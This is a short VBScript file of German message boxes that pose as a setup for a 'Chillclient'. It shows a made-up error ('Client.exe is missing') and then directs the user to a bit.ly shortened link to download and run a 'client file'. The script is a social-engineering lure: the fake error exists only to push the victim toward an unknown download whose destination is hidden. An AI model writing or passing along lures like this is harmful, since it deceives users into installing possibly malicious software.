X=MsgBox("Sind sie sicher das die Software installieren wollen?",4+64,"Bitte Waehlen sie ihre auswahl aus")
X=MsgBox("Der Chillclient wird  ihnen fertig gestellt bitte bestaetigen sie mit der Ok auswahl",0+16,"Bestaetigen sie mit der Okay auswahl taste")
X=MsgBox("Fehler 302. Ihnen fehlt die Client Datei.",0+16,"Client.exe is missing.")
X=MsgBox("Bitte oeffnen den Link um die datei zu installieren dann oeffnen sie datei wieder",0+32,"Installieren")
X=MsgBox("bit.ly/4cmiS5P",0+32,"Installieren der Client Datei") 